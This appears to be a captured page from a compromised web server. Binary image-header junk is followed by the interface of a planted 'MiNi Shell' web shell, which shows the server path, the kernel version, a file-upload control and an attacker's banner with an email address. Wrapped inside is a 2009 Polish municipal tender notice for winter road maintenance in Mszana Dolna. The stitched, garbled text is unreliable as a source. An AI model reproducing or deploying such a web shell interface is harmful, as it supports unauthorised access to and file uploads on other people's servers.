JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/363456-N-2009.html

<p class="kh_header"><b>Mszana Dolna: Świadczenie usług zimowego utrzymania dróg gminnych i  chodników na terenie Gminy Mszana Dolna w sezonie zimowym 2009/2010</b><br>
<b>Numer ogłoszenia: 363456 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Spadochroniarzy 6, 34-730 Mszana Dolna, woj. małopolskie, tel. 018 3310009 w. 615, 3319815, faks 018 3311242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług zimowego utrzymania dróg gminnych i  chodników na terenie Gminy Mszana Dolna w sezonie zimowym 2009/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest:  zimowe utrzymanie dróg gminnych , chodników  i placów  w Gminie Mszana Dolna zgodnie ze standardem nr 3 zimowego utrzymania dróg (załącznik nr 6 do SIWZ)
Zimowe utrzymanie dróg obejmuje wykonanie czynności, których celem jest zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego wywołanych takimi zjawiskami jak opady śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni w sezonie zimowym 2009/2010. 
Wykonanie zadania polega na efektywnym ( skutecznym) odśnieżaniu całej szerokości drogi, placu i chodnika  w czasie i po intensywnych opadach  śniegu lub zwalczaniu śliskości materiałem uszarstniającym podczas występowania gołoledzi na drogach gdzie jest przewidziane zwalczanie gołoledzi  jak w  załączniku  nr 2 do SIWZ  . Praca w systemie wielozmianowym we wszystkie dni tygodnia w celu utrzymania przejezdności dróg, placów i chodników ( natychmiastowe interwencje ),  pod warunkiem, że będą one każdorazowo uzgadniane z osobą wyznaczoną przez Zamawiającego.
Dozwolony dwukrotny wyjazd w ciągu dnia. Dodatkowe wyjazdy za porozumieniem z Osobą potwierdzającą  wykonanie usługi na danej części zamówienia .
Do zadań Wykonawcy należeć będzie również dwukrotne udokumentowane wykaszanie poboczy przy drogach objętych akcją zimową  w okresie letnim ( cenę należy wkalkulować w koszt odśnieżania )
Wykaz zadań podzielonych na  Części stanowiących przedmiot zamówienia:
Część 1:     Droga dojazdowa oraz plac przed budynkiem Urzędu Gminy Mszana Dolna 
Część  2:    Droga Kasina Wielka - Gruszowiec
Część   3:   Parking przy ośrodku zdrowia w Kasinie Wielkiej
Część  4:    Droga dojazdowa do remizy OSP oraz os. Pańskie 2380 mb 
Część    5:  Droga dojazdowa do remizy OSP oraz os. Pańskie 2380 mb
Część   6:   Droga dojazdowa do stacji PKP długości ok. 1100 m
Część    7:  Droga Kasina Wielka - Ługowina, do granicy z gminą Dobra 600 m
Część    8:  Interwencyjne odśnieżanie dróg w Kasinie Wielkiej
Część    9:   Droga Kuzoki od drogi krajowej nr 28 do drogi powiatowej Raba Niżna -
                    Olszówka 
Część  10:   Parking  przy Ośrodku Zdrowia w Rabie Niżnej
Część  11:   Parking  przy Ośrodku Zdrowia w Rabie Niżnej
Część  12:   Interwencyjne odśnieżanie dróg w Rabie Niżnej
Część  13:   Droga Jasionów dł. ok. 2800m
Część  14:   Droga Skalisne dł. ok. 2900m 
Część  15:   Chodnik dł. ok. 540m
Część  16:   Interwencyjne odśnieżanie dróg w Olszówce
Część  17:   Droga Łopusze długości ok. 3100m
Część  18:   Droga Bartoszki dł. ok.300m
Część  19:   Droga Żabówka - dojazd do szkoły dł.500mb
Część  20:   Parking przy ośrodku zdrowia w Kasince Małej
Część  21:   Droga do os. Kazamaty 600m
Część  22:   Interwencyjne odśnieżanie dróg w Kasince Małej
Część  23:   Droga Zagórki - Sołtysy długości ok. 1500m
Część  24:   Chodnik przy drodze wojewódzkiej 968 od mostu na Porębiance do 
                     skrzyżowania z Łostówką na długości 970 mb
Część  25:   Chodnik przy drodze wojewódzkiej 968 od mostu na os. Janie do os.   
                  Nowaki ( częściowo chodnik dwustronny) na długości 2265 mb
Część  26:   Chodnik przy drodze wojewódzkiej 968 od kościoła do mostu na tartak 
                   Kusia na długości 1288 mb
Część    27:  Droga dojazdowa do Szkoły Podstawowej nr 2 dł. ok. 400m
Część    28:  Dojazd oraz plac przy Gimnazjum w Mszanie Górnej
Część    29:  Interwencyjne odśnieżanie dróg w Mszanie Górnej
Część    30:   Droga Łętowe-Derczaki -Nowa Wieś-Mszana Górna 4300m
Część    31:  Interwencyjne odśnieżanie dróg w Łęgowem
Część    32:  Droga Pod Skałą oraz dojazd do os. Dziedziny przez os. Wojtyczki 
                      ( do godz.7.50 ) na  dł. ok. 1500mb
Część    33:  Interwencyjne odśnieżanie dróg w Łostówce
Część    34:   Droga Gęsia Szyja dł. 3000m (od drogi krajowej nr 28 do 
                   skrzyżowania z drogą Tenczyn - Glisne
Część   35:   Interwencyjne odśnieżanie dróg w Glinem
Część   36:   Droga Królewska Góra dł. ok. 1600m
Część   37:   Droga Mizery na długości 1000 m
Część   38:   Droga Frankówka  dł. ok. 1800m
Część   39:   Parkingi:
-	                               centrum wsi Lubomierz
                                     remiza OSP- Ośrodek Zdrowia
Część   40:    Chodnik przy drodze wojewódzkiej 968 od szkoły nr 1  do remizy OSP 
                    na  długości 750 mb
Część   41:     Droga Przysłop - Młyny dł. ok. 1000m
Część   42:      Dojazd i plac przy Szkole Podstawowej nr 1 w Lubomierzu ok. 500m
Część   43:     Interwencyjne odśnieżanie dróg w Lubomierzu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W tym postępowaniu nie jest wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy którzy :

1) posiadają uprawnienia do wykonywania  działalności lub czynności w zakresie
    odpowiadającym przedmiotowi zamówienia oraz nie podlegają wykluczeniu na
    podstawie art.24 u.p.z.p. W celu potwierdzenia spełnienia niniejszego warunku
    Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 

a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do           
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
     do rejestru lub zgłoszenia do ewidencji  - za aktualny będzie uważany 
     dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
     składania ofert w formie odpisu lub zaświadczenia potwierdzającego, iż Wykonawca     
            nadal figuruje w rejestrze działalności.
 
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców muszą być złożone dokumenty dotyczące każdego z nich (a, ) .

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem
    technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
    technicznego i osób zdolnych do wykonania zamówienia . W szczególności muszą
    spełnić następujący  warunek : 

  a)ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem posiadającym nakładkę gumową, sterowany z kabiny kierowcy oraz rozsypywacz do posypywania materiału uszarstniającego ( tylko do tej części zamówienia której dotyczy posypywanie ) -   a z dokumentów pojazdów musi jasno wynikać, że są to  pojazdy przystosowane do wykonania zamówienia uwzględniające skalę trudności świadczenia usługi dla danej części .  

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
    zamówienia; 

   a) muszą posiadać Polisę, a w przypadku jej braku inny  dokument po?twierdzający,  że Wykonawca jest ubezpieczony od od?powiedzialności cywilnej w zakresie prowadzonej dzia?łalności. 
 
   b). Akceptacja projektu umowy - na znak przyjęcia warunków zawartych w projekcie umowy do oferty należy załączyć projekt umowy stanowiący załącznik nr 5 do SIWZ z zaparafowanymi wszystkimi stronami.

     
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub
więcej Wykonawców oceniane będzie łącznie  ich doświadczenie i sytuacja
ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci
Wykonawcy , którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku .

2. W przypadku nie złożenia wymaganych przez Zamawiającego oświadczeń lub dokumentów  albo złożenia wymaganych przez zamawiającego oświadczeń i dokumentów zawierających błędy, lub złożenia wadliwych pełnomocnictw, Zamawiający wezwie trybie art. 26 ust 3 Wykonawców  do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
Ocena spełnienia w,w warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej.
Z treści załączonych dokumentów musi jednoznacznie wynikać , iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców  przedkłada  wraz z ofertą  sporządzoną na formularzu OFERTA ( Zał. Nr 1 do SIWZ) następujące oświadczenia dokumenty,  informacje i wykazy składające się na ofertę:
1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowi Załącznik Nr 2 do niniejszej SIWZ.
2. wykaz sprzętu - którego wzór stanowi Załącznik Nr 3 do niniejszej SIWZ.
3. polisa a w przypadku jej braku inny dokument potwierdzający , że wykonawca   
 jest ubezpieczony  od odpowiedzialności cywilnej  w zakresie prowadzonej 
działalności
4. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu   
do rejestru lub zgłoszenia do ewidencji - wystawione nie wcześniej niż 6 
miesięcy przed upływem terminu składania ofert,  
5. Projekt umowy którego wzór stanowi Załącznik Nr 4 do niniejszej SIWZ.

Ponadto wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą Pełnomocnictwo dla pełnomocnika, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mszana.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mszana Dolna ul. Spadochroniarzy 6 pok. nr 44.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 10:00, miejsce: Urząd Gminy 34-730 Mszana Dolna ul. Spadochroniarzy 6 pok. nr 32.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com